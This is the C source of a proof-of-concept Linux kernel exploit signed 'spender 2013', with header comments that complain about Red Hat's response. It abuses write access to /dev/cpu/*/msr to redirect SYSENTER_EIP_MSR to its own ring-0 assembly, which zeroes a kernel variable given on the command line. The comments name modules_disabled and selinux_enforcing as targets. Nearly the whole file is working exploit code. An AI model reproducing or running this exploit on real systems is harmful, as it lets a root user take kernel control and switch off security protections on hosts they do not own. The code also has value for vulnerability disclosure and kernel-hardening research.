// PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
// can do whatever in the commented area, re-enable module support, etc
// requires CONFIG_X86_MSR and just uid 0
// a small race exists between the time when the MSR is written to the first
// time and when we issue our sysenter
// we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
// configured to take a hex arg of a dword pointer to set to 0
// (modules_disabled, selinux_enforcing, take your pick)
//
// Hello to Red Hat, who has shown yet again to not care until a
// public exploit is released. Not even a bugtraq entry existed in
// their system until this was published -- and they have a paid team
// of how many?
// It's not as if I didn't mention the problem and existence of an easy
// exploit multiple times prior:
//
// spender 2013
#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/mman.h>
#define SYSENTER_EIP_MSR 0x176
u_int64_t msr;
unsigned
long
ourstack[65536];
u_int64_t payload_data[16];
extern
void
*_ring0;
extern
void
*_ring0_end;
void
ring0(
void
)
{
__asm
volatile
(
".globl _ring0\n"
"_ring0:\n"
".intel_syntax noprefix\n"
".code64\n"
// set up stack pointer with 'ourstack'
"mov esp, ecx\n"
// save registers, contains the original MSR value
"push rax\n"
"push rbx\n"
"push rcx\n"
"push rdx\n"
// play with the kernel here with interrupts disabled!
"mov rcx, qword ptr [rbx+8]\n"
"test rcx, rcx\n"
"jz skip_write\n"
"mov dword ptr [rcx], 0\n"
"skip_write:\n"
// restore MSR value before returning
"mov ecx, 0x176\n"
// SYSENTER_EIP_MSR
"mov eax, dword ptr [rbx]\n"
"mov edx, dword ptr [rbx+4]\n"
"wrmsr\n"
"pop rdx\n"
"pop rcx\n"
"pop rbx\n"
"pop rax\n"
"sti\n"
"sysexit\n"
".code32\n"
".att_syntax prefix\n"
".global _ring0_end\n"
"_ring0_end:\n"
);
}
unsigned
long
saved_stack;
int
main(
int
argc,
char
*argv[])
{
cpu_set_t set;
int
msr_fd;
int
ret;
u_int64_t new_msr;
struct
sched_param sched;
u_int64_t resolved_addr = 0ULL;
if
(argc == 2)
resolved_addr = strtoull(argv[1], NULL, 16);
/* can
do
this
without privilege */
mlock(_ring0, (unsigned
long
)_ring0_end - (unsigned
long
)_ring0);
mlock(&payload_data,
sizeof
(payload_data));
CPU_ZERO(&set);
CPU_SET(0, &set);
sched.sched_priority = 99;
ret = sched_setscheduler(0, SCHED_FIFO, &sched);
if
(ret) {
fprintf
(stderr,
"Unable to set priority.\n"
);
exit
(1);
}
ret = sched_setaffinity(0,
sizeof
(cpu_set_t), &set);
if
(ret) {
fprintf
(stderr,
"Unable to set affinity.\n"
);
exit
(1);
}
msr_fd = open(
"/dev/cpu/0/msr"
, O_RDWR);
if
(msr_fd < 0) {
msr_fd = open(
"/dev/msr0"
, O_RDWR);
if
(msr_fd < 0) {
fprintf
(stderr,
"Unable to open /dev/cpu/0/msr\n"
);
exit
(1);
}
}
lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
ret = read(msr_fd, &msr,
sizeof
(msr));
if
(ret !=
sizeof
(msr)) {
fprintf
(stderr,
"Unable to read /dev/cpu/0/msr\n"
);
exit
(1);
}
// stuff some addresses in a buffer whose address we
// pass to the "kernel" via register
payload_data[0] = msr;
payload_data[1] = resolved_addr;
printf
(
"Old SYSENTER_EIP_MSR = %016llx\n"
, msr);
fflush
(stdout);
lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
new_msr = (u_int64_t)(unsigned
long
)&_ring0;
printf
(
"New SYSENTER_EIP_MSR = %016llx\n"
, new_msr);
fflush
(stdout);
ret = write(msr_fd, &new_msr,
sizeof
(new_msr));
if
(ret !=
sizeof
(new_msr)) {
fprintf
(stderr,
"Unable to modify /dev/cpu/0/msr\n"
);
exit
(1);
}
__asm
volatile
(
".intel_syntax noprefix\n"
".code32\n"
"mov saved_stack, esp\n"
"lea ecx, ourstack\n"
"lea edx, label2\n"
"lea ebx, payload_data\n"
"sysenter\n"
"label2:\n"
"mov esp, saved_stack\n"
".att_syntax prefix\n"
);
printf
(
"Success.\n"
);
return
0;
}